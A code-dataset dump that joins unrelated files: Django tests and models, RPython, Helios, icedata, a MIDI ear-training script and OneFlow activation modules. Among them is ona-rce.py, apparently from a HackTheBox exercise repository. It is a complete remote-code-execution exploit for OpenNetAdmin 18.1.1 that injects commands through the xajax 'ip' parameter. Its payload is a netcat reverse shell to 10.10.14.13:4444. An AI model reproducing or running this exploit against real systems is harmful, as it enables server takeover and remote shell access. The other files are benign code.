] | 1 | 2021-08-17T07:30:35.000Z | 2021-08-17T07:30:35.000Z | yatube/posts/tests/test_urls.py | Ecmek/yatube_project | 24206ad81c73c184e0f24ca7242c3f8233278592 | [
"BSD-3-Clause"
] | null | null | null | yatube/posts/tests/test_urls.py | Ecmek/yatube_project | 24206ad81c73c184e0f24ca7242c3f8233278592 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.core.cache import cache
from posts.models import Post, Group
User = get_user_model()
index = '/'
group = 'group'
test_slug = 'test_slug'
fake_slug = 'fake_slug'
new_post = 'new'
post_edit = 'edit'
post_delete = 'delete'
follow_index = 'follow'
profile_follow = 'follow'
profile_unfollow = 'unfollow'
post_author = 'post_author'
another_user = 'another_user'
fake_author = 'fake_author'
login = 'auth/login'
| 38.253165 | 79 | 0.595963 | from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.core.cache import cache
from posts.models import Post, Group
User = get_user_model()
index = '/'
group = 'group'
test_slug = 'test_slug'
fake_slug = 'fake_slug'
new_post = 'new'
post_edit = 'edit'
post_delete = 'delete'
follow_index = 'follow'
profile_follow = 'follow'
profile_unfollow = 'unfollow'
post_author = 'post_author'
another_user = 'another_user'
fake_author = 'fake_author'
login = 'auth/login'
class StaticURLTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
        # Create a group to check access to /group/test-slug/
cls.group = Group.objects.create(
title='Тестовое название группы',
slug='test_slug',
description='Тестовое описание группы',
)
        # Create the post author
cls.user = User.objects.create_user(
username='post_author'
)
        # Create a regular user
cls.user_2 = User.objects.create_user(
username='another_user'
)
        # Create a post authored by post_author
cls.post = Post.objects.create(
text='рандомный текст',
author=StaticURLTests.user,
group=StaticURLTests.group,
)
def setUp(self):
        # Set up data for testing
        # Create a client instance. It is not authorized.
self.guest_client = Client()
        # Log in the post author
self.post_author = Client()
self.post_author.force_login(self.user)
        # Log in the regular user
self.authorized_client = Client()
self.authorized_client.force_login(self.user_2)
cache.clear()
def test_guest_client_urls_status_code(self):
        # Status codes for an unauthenticated user
field_response_urls_code = {
f'{index}': 200,
f'/{group}/{test_slug}/': 200,
f'/{group}/{fake_slug}/': 404,
f'/{new_post}/': 302,
f'/{follow_index}/': 302,
f'/{post_author}/{profile_follow}/': 302,
f'/{post_author}/{profile_unfollow}/': 302,
f'/{post_author}/': 200,
f'/{post_author}/1/': 200,
f'/{post_author}/1/{post_edit}/': 302,
f'/{post_author}/1/{post_delete}/': 302,
f'/{fake_author}/': 404,
f'/{fake_author}/1/': 404,
}
for url, response_code in field_response_urls_code.items():
with self.subTest(url=url):
status_code = self.guest_client.get(url).status_code
self.assertEqual(status_code, response_code)
def test_authorized_client_urls_status_code(self):
        # Status codes for an authenticated user
field_response_urls_code = {
f'{index}': 200,
f'/{group}/{test_slug}/': 200,
f'/{group}/{fake_slug}/': 404,
f'/{follow_index}/': 200,
f'/{new_post}/': 200,
f'/{post_author}/{profile_follow}/': 302,
f'/{post_author}/{profile_unfollow}/': 302,
f'/{another_user}/{profile_follow}/': 302,
f'/{another_user}/{profile_unfollow}/': 302,
f'/{post_author}/': 200,
f'/{post_author}/1/': 200,
f'/{post_author}/1/{post_edit}/': 302,
f'/{post_author}/1/{post_delete}/': 302,
}
for url, response_code in field_response_urls_code.items():
with self.subTest(url=url):
status_code = self.authorized_client.get(url).status_code
self.assertEqual(status_code, response_code)
def test_guest_client_redirect(self):
        # Check redirects for an unauthenticated user
redirect_response = {
f'/{new_post}/': f'/{login}/?next=/{new_post}/',
f'/{post_author}/1/{post_edit}/': f'/{post_author}/1/',
f'/{follow_index}/': f'/{login}/?next=/{follow_index}/',
f'/{another_user}/{profile_follow}/':
f'/{login}/?next=/{another_user}/{profile_follow}/',
f'/{another_user}/{profile_unfollow}/':
f'/{login}/?next=/{another_user}/{profile_unfollow}/',
f'/{post_author}/1/{post_delete}/':
f'/{login}/?next=/{post_author}/1/{post_delete}/',
}
for url, redirect in redirect_response.items():
with self.subTest(url=url):
response = self.guest_client.get(url)
self.assertRedirects(response, redirect)
def test_authorized_client_redirect(self):
        # Check redirect for a user who is not the post author
response = self.authorized_client.get(f'/{post_author}/1/{post_edit}/')
self.assertRedirects(response, f'/{post_author}/1/')
def test_author_post_edit_status_code(self):
        # The edit page is accessible to the post author
response = self.post_author.get(
f'/{post_author}/1/{post_edit}/'
).status_code
self.assertEqual(response, 200)
def test_author_post_delete_status_code(self):
        # Post deletion redirects for the post author
response = self.post_author.get(
f'/{post_author}/1/{post_delete}/'
).status_code
self.assertEqual(response, 302)
def test_urls_use_correct_template(self):
        # Each URL uses the corresponding template
templates_url_names = {
f'{index}': 'index.html',
f'/{group}/{test_slug}/': 'group.html',
f'/{follow_index}/': 'follow.html',
f'/{new_post}/': 'new_post.html',
f'/{post_author}/': 'profile.html',
f'/{post_author}/1/': 'post.html',
f'/{post_author}/1/{post_edit}/': 'new_post.html',
}
for adress, template in templates_url_names.items():
with self.subTest(adress=adress):
adress_url = self.post_author.get(adress)
self.assertTemplateUsed(adress_url, template)
| 5,785 | 269 | 23 |
0eb6b21802f5e9103e5fdcfae002c9610a22fe79 | 1,061 | py | Python | users/models.py | Yuri-Lima/SharePay | 18547053f7e86571366abf4ec4310bf1553395c5 | [
"MIT"
] | 1 | 2021-06-14T00:42:52.000Z | 2021-06-14T00:42:52.000Z | users/models.py | Yuri-Lima/SharePay | 18547053f7e86571366abf4ec4310bf1553395c5 | [
"MIT"
] | 72 | 2021-06-08T14:18:23.000Z | 2021-07-19T05:33:40.000Z | users/models.py | Yuri-Lima/SharePay | 18547053f7e86571366abf4ec4310bf1553395c5 | [
"MIT"
] | null | null | null | from typing import AbstractSet
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
| 32.151515 | 75 | 0.656927 | from typing import AbstractSet
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
class CustomUser(AbstractUser):
first_name = models.CharField(max_length=100, null= True, blank= True)
last_name = models.CharField(max_length=100, null= True, blank= True)
email = models.EmailField(max_length=255, unique=True)
class Meta:
verbose_name = _("User")
verbose_name_plural = _("Users")
def __str__(self):
if self.first_name and self.last_name:
fullname = self.first_name + ' ' + self.last_name
return fullname
else:
return self.username
def clean(self):
pass
# self.first_name = self.first_name.capitalize()
# self.last_name = self.last_name.capitalize()
def get_absolute_url(self):
return reverse("users:update", kwargs={"pk": self.pk})
| 380 | 411 | 24 |
5e2a3eca705b4a75c88e80e14b7a803235508b60 | 1,045 | py | Python | rpython/jit/backend/arm/detect.py | kantai/passe-pypy-taint-tracking | b60a3663f8fe89892dc182c8497aab97e2e75d69 | [
"MIT"
] | 2 | 2016-07-06T23:30:20.000Z | 2017-05-30T15:59:31.000Z | rpython/jit/backend/arm/detect.py | kantai/passe-pypy-taint-tracking | b60a3663f8fe89892dc182c8497aab97e2e75d69 | [
"MIT"
] | null | null | null | rpython/jit/backend/arm/detect.py | kantai/passe-pypy-taint-tracking | b60a3663f8fe89892dc182c8497aab97e2e75d69 | [
"MIT"
] | 2 | 2020-07-09T08:14:22.000Z | 2021-01-15T18:01:25.000Z | from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper.tool import rffi_platform
from rpython.translator.platform import CompilationError
eci = ExternalCompilationInfo(
post_include_bits=["""
// we need to disable optimizations so the compiler does not remove this
// function when checking if the file compiles
static void __attribute__((optimize("O0"))) pypy__arm_has_vfp()
{
asm volatile("VMOV s0, s1");
}
"""])
def detect_float():
"""Check for hardware float support
we try to compile a function containing a VFP instruction, and if the
compiler accepts it we assume we are fine
"""
try:
rffi_platform.verify_eci(eci)
return True
except CompilationError:
return False
| 32.65625 | 73 | 0.735885 | from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper.tool import rffi_platform
from rpython.translator.platform import CompilationError
eci = ExternalCompilationInfo(
post_include_bits=["""
// we need to disable optimizations so the compiler does not remove this
// function when checking if the file compiles
static void __attribute__((optimize("O0"))) pypy__arm_has_vfp()
{
asm volatile("VMOV s0, s1");
}
"""])
def detect_hardfloat():
# http://gcc.gnu.org/ml/gcc-patches/2010-10/msg02419.html
if rffi_platform.getdefined('__ARM_PCS_VFP', ''):
return rffi_platform.getconstantinteger('__ARM_PCS_VFP', '')
return False
def detect_float():
"""Check for hardware float support
we try to compile a function containing a VFP instruction, and if the
compiler accepts it we assume we are fine
"""
try:
rffi_platform.verify_eci(eci)
return True
except CompilationError:
return False
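# Hedged usage sketch (added for illustration): both probes above are this module's
# own functions; a backend setup step might gate float support on them like this.
if __name__ == "__main__":
    print("hard-float ABI:", detect_hardfloat())
    print("VFP usable:", detect_float())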
| 203 | 0 | 23 |
1f67795097e35d599aea4f61805cac7c3ba14838 | 322 | py | Python | helios/nodes/ropsten.py | hyperevo/py-helios-node | ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8 | [
"MIT"
] | null | null | null | helios/nodes/ropsten.py | hyperevo/py-helios-node | ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8 | [
"MIT"
] | null | null | null | helios/nodes/ropsten.py | hyperevo/py-helios-node | ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8 | [
"MIT"
] | null | null | null | from helios.chains.ropsten import (
RopstenFullChain,
RopstenLightDispatchChain,
)
from helios.nodes.light import LightNode
from helios.nodes.full import FullNode
| 21.466667 | 43 | 0.804348 | from helios.chains.ropsten import (
RopstenFullChain,
RopstenLightDispatchChain,
)
from helios.nodes.light import LightNode
from helios.nodes.full import FullNode
class RopstenFullNode(FullNode):
chain_class = RopstenFullChain
class RopstenLightNode(LightNode):
chain_class = RopstenLightDispatchChain
| 0 | 103 | 46 |
b776aa6a895912c21971a838bd9b4ff69860dcbe | 562 | py | Python | icedata/datasets/coco/tests/test_parser.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | null | null | null | icedata/datasets/coco/tests/test_parser.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | null | null | null | icedata/datasets/coco/tests/test_parser.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | null | null | null | import icedata
from icevision.all import *
| 29.578947 | 83 | 0.647687 | import icedata
from icevision.all import *
def test_parser(data_dir):
class_map = icedata.coco.class_map()
parser = icedata.coco.parser(
annotations_file=data_dir / "annotations.json", img_dir=data_dir / "images"
)
records = parser.parse(data_splitter=SingleSplitSplitter())[0]
assert len(records) == 5
r = records[2]
assert (r["height"], r["width"]) == (427, 640)
assert r["imageid"] == 2
assert r["bboxes"][0].xywh == (0.0, 73.89, 416.44, 305.13)
assert r["filepath"] == data_dir / "images/000000128372.jpg"
| 495 | 0 | 23 |
d5d782f07d49524242d5d7d49587dfa75702b348 | 2,892 | py | Python | source/07/mc-7-5-tp-cde-hd.py | schef/schef.github.io | ac6fc70e5077deeeb8233ede89e0895fdc2a0d05 | [
"MIT"
] | null | null | null | source/07/mc-7-5-tp-cde-hd.py | schef/schef.github.io | ac6fc70e5077deeeb8233ede89e0895fdc2a0d05 | [
"MIT"
] | null | null | null | source/07/mc-7-5-tp-cde-hd.py | schef/schef.github.io | ac6fc70e5077deeeb8233ede89e0895fdc2a0d05 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Written by Stjepan Horvat
# ( zvanstefan@gmail.com )
# by the exercises from David Lucas Burge - Perfect Pitch Ear Training Supercourse
# Thanks to Wojciech M. Zabolotny ( wzab@ise.pw.edu.pl ) for snd-virmidi example
# ( wzab@ise.pw.edu.pl )
import random
import time
import sys
import re
fname="/dev/snd/midiC2D0"
#fname=sys.argv[1]
fin=open(fname,"rb")
fout=open(fname,"wb")
#keymin=int(sys.argv[2])
#keymax=int(sys.argv[3])
#keymin=int(60)
#keymax=int(72)
#c major scale
print ("Exercise 7-4:")
print ("C D and E. Harmonic and melodic pitch indentification. Melodic doubles.")
#from c to c'' white tones
#c major scale
#notes = [ 36, 38, 40, 41, 43, 45, 47, 48, 50, 52, 53, 55, 57, 59, 60, 62, 64, 65, 67, 69, 71, 72, 74, 76, 77, 79, 81, 83, 84, 86, 88, 89, 91, 93, 95, 96 ]
notes = [ 36, 38, 40, 48, 50, 52, 60, 62, 64, 72, 74, 76, 84, 86, 88, 96 ]
noteC = [ 36, 48, 60, 72, 84, 96 ]
usage = "Usage: 1-repeat, <note> <note> \"c d\", ?-usage."
round = 1
a = re.compile("^[c-e] [c-e]$")
try:
print(usage)
while True:
noteOne = random.choice(notes)
while True:
noteTwo = random.choice(notes)
if nameNote(noteOne) != nameNote(noteTwo) and noteOne < noteTwo:
break
match = False
while not match:
done = False
playTwoNotes(noteOne, noteTwo)
while not done:
n = input("? ")
if n == "1":
playTwoNotes(noteOne, noteTwo)
if n == "?":
print(usage)
        #TODO: bug - accepts anything instead of only note names
elif a.match(n):
splitNote = n.split()
if splitNote[0] == nameNote(noteOne).lower() and splitNote[1] == nameNote(noteTwo).lower():
round += 1
print("Correct. Next round. " + str(round) + ".:")
done = True
match = True
else:
playTwoNotes(name2Note(splitNote[0]), name2Note(splitNote[1]))
except KeyboardInterrupt:
pass
| 27.283019 | 155 | 0.603389 | #!/usr/bin/python
# Written by Stjepan Horvat
# ( zvanstefan@gmail.com )
# by the exercises from David Lucas Burge - Perfect Pitch Ear Training Supercourse
# Thanks to Wojciech M. Zabolotny ( wzab@ise.pw.edu.pl ) for snd-virmidi example
# ( wzab@ise.pw.edu.pl )
import random
import time
import sys
import re
fname="/dev/snd/midiC2D0"
#fname=sys.argv[1]
fin=open(fname,"rb")
fout=open(fname,"wb")
#keymin=int(sys.argv[2])
#keymax=int(sys.argv[3])
#keymin=int(60)
#keymax=int(72)
#c major scale
print ("Exercise 7-4:")
print ("C D and E. Harmonic and melodic pitch indentification. Melodic doubles.")
#from c to c'' white tones
#c major scale
#notes = [ 36, 38, 40, 41, 43, 45, 47, 48, 50, 52, 53, 55, 57, 59, 60, 62, 64, 65, 67, 69, 71, 72, 74, 76, 77, 79, 81, 83, 84, 86, 88, 89, 91, 93, 95, 96 ]
notes = [ 36, 38, 40, 48, 50, 52, 60, 62, 64, 72, 74, 76, 84, 86, 88, 96 ]
noteC = [ 36, 48, 60, 72, 84, 96 ]
def playNote(note):
fout.write((chr(0x90)+chr(note)+chr(127)).encode('utf-8'))
fout.flush()
time.sleep(0.7)
fout.write((chr(0x80)+chr(note)+chr(127)).encode('utf-8'))
fout.flush()
def playTwoNotes(noteOne, noteTwo):
fout.write((chr(0x90)+chr(noteOne)+chr(127)).encode('utf-8'))
fout.write((chr(0x90)+chr(noteTwo)+chr(127)).encode('utf-8'))
fout.flush()
time.sleep(0.7)
fout.write((chr(0x80)+chr(noteOne)+chr(127)).encode('utf-8'))
fout.write((chr(0x80)+chr(noteTwo)+chr(127)).encode('utf-8'))
fout.flush()
def nameNote(note):
if note in noteC:
return("C")
elif note-2 in noteC:
return("D")
elif note-4 in noteC:
return("E")
elif note-5 in noteC:
return("F")
elif note-7 in noteC:
return("G")
elif note-9 in noteC:
return("A")
elif note-11 in noteC:
return("H")
def name2Note(name):
if name == "c":
return(60)
if name == "d":
return(62)
if name == "e":
return(64)
usage = "Usage: 1-repeat, <note> <note> \"c d\", ?-usage."
round = 1
a = re.compile("^[c-e] [c-e]$")
try:
print(usage)
while True:
noteOne = random.choice(notes)
while True:
noteTwo = random.choice(notes)
if nameNote(noteOne) != nameNote(noteTwo) and noteOne < noteTwo:
break
match = False
while not match:
done = False
playTwoNotes(noteOne, noteTwo)
while not done:
n = input("? ")
if n == "1":
playTwoNotes(noteOne, noteTwo)
if n == "?":
print(usage)
        #TODO: bug - accepts anything instead of only note names
elif a.match(n):
splitNote = n.split()
if splitNote[0] == nameNote(noteOne).lower() and splitNote[1] == nameNote(noteTwo).lower():
round += 1
print("Correct. Next round. " + str(round) + ".:")
done = True
match = True
else:
playTwoNotes(name2Note(splitNote[0]), name2Note(splitNote[1]))
except KeyboardInterrupt:
pass
| 859 | 0 | 92 |
bf6ec23f96f67a0ce44645429441edc8de70865c | 207 | py | Python | src/sinks/sink.py | lavriv92/sinks | bbd116ea9a2beb14179a86aa2e8c931582939b36 | [
"MIT"
] | 1 | 2021-12-22T13:43:34.000Z | 2021-12-22T13:43:34.000Z | src/sinks/sink.py | lavriv92/sinks | bbd116ea9a2beb14179a86aa2e8c931582939b36 | [
"MIT"
] | null | null | null | src/sinks/sink.py | lavriv92/sinks | bbd116ea9a2beb14179a86aa2e8c931582939b36 | [
"MIT"
] | null | null | null | import functools
import requests
from sinks.base_source import BaseSource
| 20.7 | 79 | 0.748792 | import functools
import requests
from sinks.base_source import BaseSource
class Source(BaseSource):
def __call__(self):
return functools.reduce(lambda acc, f: f(acc), self.funcs, self.source)
| 78 | 4 | 49 |
fb2b284ea4ef5aaab01e5a4a4aad1fc067550c17 | 720 | py | Python | tests/test_accmip6.py | pkufubo/acccmip6 | 762200f314a26b4e0eeb971b607c1b3a81a57d30 | [
"MIT"
] | 59 | 2019-09-19T10:01:00.000Z | 2022-03-31T07:05:00.000Z | tests/test_accmip6.py | pkufubo/acccmip6 | 762200f314a26b4e0eeb971b607c1b3a81a57d30 | [
"MIT"
] | 6 | 2020-11-19T08:58:23.000Z | 2022-02-07T12:57:23.000Z | tests/test_accmip6.py | pkufubo/acccmip6 | 762200f314a26b4e0eeb971b607c1b3a81a57d30 | [
"MIT"
] | 10 | 2019-11-24T15:39:59.000Z | 2022-01-22T08:58:21.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_accmip6
----------------------------------
Tests for `accmip6` module.
"""
import pytest
from pathlib import Path
from acccmip6.utilities.c6db import SearchDB
from acccmip6.utilities.util import _dir_path, _Construct_urls
| 25.714286 | 94 | 0.604167 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_accmip6
----------------------------------
Tests for `accmip6` module.
"""
import pytest
from pathlib import Path
from acccmip6.utilities.c6db import SearchDB
from acccmip6.utilities.util import _dir_path, _Construct_urls
def test_url_getter():
d = SearchDB()
d.variable = 'var1, var2, var3, varN'
url = d.get_url()
durl=_Construct_urls(['var1', 'var2', 'var3', 'varN'],None,None,None,None)._Durl
assert url == durl+"&variable=var1&variable=var2&variable=var3&variable=varN&limit=10000"
def test_dir_path():
d = _dir_path()
p=Path('.')
assert d._get_dir('') == p.absolute() / 'CMIP6'
| 358 | 0 | 62 |
3069cb0d11663e532a2bd9872633694a80c03d36 | 2,385 | py | Python | Machines/OPENADMIN/ona-rce.py | limitedeternity/HackTheBox | ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09 | [
"MIT"
] | null | null | null | Machines/OPENADMIN/ona-rce.py | limitedeternity/HackTheBox | ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09 | [
"MIT"
] | null | null | null | Machines/OPENADMIN/ona-rce.py | limitedeternity/HackTheBox | ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09 | [
"MIT"
] | 3 | 2021-12-29T10:39:01.000Z | 2022-03-29T22:56:40.000Z | #!/usr/bin/python3
'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
if __name__ == '__main__':
print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
filename = sys.argv[0]
if len(sys.argv) != 3:
helper(filename)
else:
print("[+] Connecting !")
opt = sys.argv[1].lower()
target = sys.argv[2] + '/'
if opt == 'check':
if (check(target)):
print("[+] The remote host is vulnerable!")
else:
print("[-] The remote host is NOT vulnerable!")
elif opt == 'exploit':
if (check(target)):
print("[+] Connected Successfully!")
else:
print("[-] Warning: Error while connecting o the remote target")
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f"
print(exploit(target, cmd))
else:
print("[-] Warning: Command not found !")
| 33.591549 | 98 | 0.587841 | #!/usr/bin/python3
'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def helper(filename):
print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
print("\n[*] Options:")
print("\t[+] check : Verify if the target is vulnerable")
print("\t[+] exploit : Exploiting the target\n")
exit(1)
def check(target):
try:
req = requests.get(url = target, verify = False)
except:
print("[-] Warning: Error while connecting o the remote target")
exit(1)
return('v18.1.1' in req.text)
def exploit(target, cmd):
payload = {
'xajax':'window_submit',
'xajaxr':'1574117726710',
'xajaxargs[]':['tooltips','ip=>;echo \"BEGIN\";{} 2>&1;echo \"END\"'.format(cmd),'ping']
}
try:
req = requests.post(url = target, data = payload, verify = False)
except:
print("[-] Warning: Error while connecting o the remote target")
exit(1)
data = req.text
result = data[data.find('BEGIN')+6:data.find('END')-1]
return(result)
if __name__ == '__main__':
print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
filename = sys.argv[0]
if len(sys.argv) != 3:
helper(filename)
else:
print("[+] Connecting !")
opt = sys.argv[1].lower()
target = sys.argv[2] + '/'
if opt == 'check':
if (check(target)):
print("[+] The remote host is vulnerable!")
else:
print("[-] The remote host is NOT vulnerable!")
elif opt == 'exploit':
if (check(target)):
print("[+] Connected Successfully!")
else:
print("[-] Warning: Error while connecting o the remote target")
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f"
print(exploit(target, cmd))
else:
print("[-] Warning: Command not found !")
| 904 | 0 | 67 |
42175e58c2c15f5ee99e556b90c3a5806c720a50 | 23,640 | py | Python | oneflow/python/nn/modules/activation.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | null | null | null | oneflow/python/nn/modules/activation.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | null | null | null | oneflow/python/nn/modules/activation.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import oneflow._oneflow_internal
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export, experimental_api
from oneflow.python.framework.tensor import register_tensor_op
from typing import Optional
@oneflow_export("nn.ReLU")
@experimental_api
class ReLU(Module):
r"""Applies the rectified linear unit function element-wise:
:math:`\text{ReLU}(x) = (x)^+ = \max(0, x)`
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import oneflow.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> relu = flow.nn.ReLU()
>>> ndarr = np.asarray([1, -2, 3])
>>> x = flow.Tensor(ndarr)
>>> relu(x).numpy()
array([1., 0., 3.], dtype=float32)
"""
@oneflow_export("nn.ReLU6")
@experimental_api
class ReLU6(Module):
r"""Applies the element-wise function:
.. math::
\text{Relu6}(x) = \begin{cases}
6 & \text{ if } x > 6 \\
0 & \text{ if } x < 0 \\
x & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> relu6 = flow.nn.ReLU6()
>>> out = relu6(input).numpy()
>>> print(out)
[0. 0. 0.5]
"""
@oneflow_export("nn.Tanh")
@experimental_api
class Tanh(Module):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-1, 0, 1]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> tanh = flow.nn.Tanh()
>>> out = tanh(input).numpy()
>>> print(out)
[-0.7615942 0. 0.7615942]
"""
@oneflow_export("tanh")
@register_tensor_op("tanh")
@experimental_api
def tanh_op(x):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
x = np.array([-1, 0, 1]).astype(np.float32)
input = flow.Tensor(x)
tanh = flow.nn.Tanh()
out = tanh(input).numpy()
# out [-0.7615942 0. 0.7615942]
"""
return Tanh()(x)
@oneflow_export("nn.ELU")
@experimental_api
class ELU(Module):
r"""Applies the element-wise function:
.. math::
\text{ELU}(x) = \begin{cases}
x & \text{ if } x \gt 0 \\
\alpha*(exp(x)-1) & \text{ if } x \le 0 \\
\end{cases}
Args:
alpha: the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> elu = flow.nn.ELU()
>>> out = elu(input).numpy()
>>> print(out)
[-0.39346933 0. 0.5 ]
"""
@oneflow_export("nn.GELU")
@experimental_api
class GELU(Module):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
@oneflow_export("gelu")
@register_tensor_op("gelu")
@experimental_api
def gelu_op(x):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
return GELU()(x)
@oneflow_export("nn.Sigmoid")
@experimental_api
class Sigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
m = flow.nn.Sigmoid() # or y = flow.sigmoid(x)
y = m(x)
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
@oneflow_export("sigmoid")
@register_tensor_op("sigmoid")
@experimental_api
def sigmoid_op(x):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
y = x.sigmoid()
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
return Sigmoid()(x)
@oneflow_export("nn.Hardsigmoid")
@experimental_api
